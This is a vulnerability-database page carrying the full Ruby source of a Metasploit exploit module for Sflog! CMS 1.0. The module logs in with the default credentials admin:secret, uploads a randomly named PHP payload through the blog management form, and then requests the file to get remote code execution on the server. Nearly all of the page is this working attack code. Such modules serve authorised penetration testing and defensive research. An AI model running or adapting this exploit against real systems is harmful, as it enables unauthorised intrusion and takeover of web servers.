Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sflog! CMS 1.0 Arbitrary File Upload Vulnerability

🗓️ 06 Sep 2012 23:30:45Reported by dun, sinn3r <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 16 Views

Sflog! CMS 1.0 Arbitrary File Upload Vulnerability. Flaws in default admin credentials, allowing unauthorized access and remote code execution

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
      'Description'    => %q{
        This module exploits multiple design flaws in Sflog 1.0.  By default, the CMS has
        a default admin credential of "admin:secret", which can be abused to access
        administrative features such as blogs management.  Through the management
        interface, we can upload a backdoor that's accessible by any remote user, and then
        gain arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'dun',    # Discovery, PoC
          'sinn3r'  # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '83767'],
          ['EDB', '19626']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Platform'       => %w{ linux php },
      'Targets'        =>
        [
        [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
        [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-07-06',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/sflog/']),
        OptString.new('USERNAME',  [true, 'The username to login with', 'admin']),
        OptString.new('PASSWORD',  [true, 'The password to login with', 'secret'])
      ])
  end


  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    res = send_request_raw({'uri'=>"#{base}/index.php"})

    if not res
      return Exploit::CheckCode::Unknown
    elsif res and res.body =~ /\<input type\=\"hidden\" name\=\"sitesearch\" value\=\"www\.thebonnotgang\.com\/sflog/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  #
  # login unfortunately is needed, because we need to make sure blogID is set, and the upload
  # script (uploadContent.inc.php) doesn't actually do that, even though we can access it
  # directly.
  #
  def do_login(base)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => "#{base}/admin/login.php",
      'vars_post' => {
        'userID'   => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
    })

    if res and res.get_cookies.include?('PHPSESSID') and res.body !~ /\<i\>Access denied\!\<\/i\>/
      return res.get_cookies
    else
      return ''
    end
  end


  #
  # Upload our payload, and then execute it.
  #
  def upload_exec(cookie, base, php_fname, p)
    data = Rex::MIME::Message.new
    data.add_part('download', nil, nil, "form-data; name=\"blogID\"")
    data.add_part('7', nil, nil, "form-data; name=\"contentType\"")
    data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
    data.add_part(p, 'text/plain', nil, "form-data; name=\"fileID\"; filename=\"#{php_fname}\"")

    post_data = data.to_s

    print_status("Uploading payload (#{p.length.to_s} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}/admin/manage.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data,
      'cookie' => cookie,
      'headers' => {
        'Referer' => "http://#{rhost}#{base}/admin/manage.php",
        'Origin'  => "http://#{rhost}"
      }
    })

    if not res
      print_error("No response from host")
      return
    end

    target_path = "#{base}/blogs/download/uploads/#{php_fname}"
    print_status("Requesting '#{target_path}'...")
    res = send_request_raw({'uri'=>target_path})
    if res and res.code == 404
      print_error("Upload unsuccessful: #{res.code.to_s}")
      return
    end

    handler
  end


  def exploit
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    cookie = do_login(base)

    if cookie.empty?
      print_error("Unable to login")
      return
    end

    php_fname =  "#{Rex::Text.rand_text_alpha(5)}.php"

    p = get_write_exec_payload(:unlink_self=>true)
    upload_exec(cookie, base, php_fname, p)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
0.9Low risk
Vulners AI Score0.9
sflogcmsarbitrary file uploadvulnerabilitydesign flawsdefault credentialsremote code execution
16